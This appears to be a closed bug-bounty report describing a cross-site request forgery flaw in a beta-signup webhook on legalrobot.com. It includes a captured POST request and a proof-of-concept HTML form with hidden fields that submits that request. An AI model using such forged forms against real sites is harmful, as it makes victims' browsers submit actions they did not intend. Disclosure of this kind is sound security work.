CSRF Issue
L
Legal Robot
Submitted None
Actions:
Reported by
hrj
Vulnerability Details
Technical details and impact analysis
Found CSRF Issue in https://www.legalrobot.com/beta/nl/
POST Request :
POST /webhooks/beta HTTP/1.1
Host: app.legalrobot.com
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:48.0) Gecko/20100101 Firefox/48.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
DNT: 1
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: https://www.legalrobot.com/beta/nl/
Content-Length: 107
origin: https://www.legalrobot.com
Connection: close
firstName=jdsfkds&lastName=dskfdsj&position=sdkdsj&company=skdjf&email=heeraj123%40gmail.com&language=Dutch
Attacker can implement a form such as the below one for intiating attack:
<body>
<form action="https://app.legalrobot.com/webhooks/beta" method="POST">
<input type="hidden" name="firstName" value="jdsfkds" />
<input type="hidden" name="lastName" value="dskfdsj" />
<input type="hidden" name="position" value="sdkdsj" />
<input type="hidden" name="company" value="skdjf" />
<input type="hidden" name="email" value="heeraj123@gmail.com" />
<input type="hidden" name="language" value="Dutch" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
Reference:
https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)
Report Details
Additional information and metadata
State
Closed
Substate
Informative
Submitted
Weakness
Cross-Site Request Forgery (CSRF)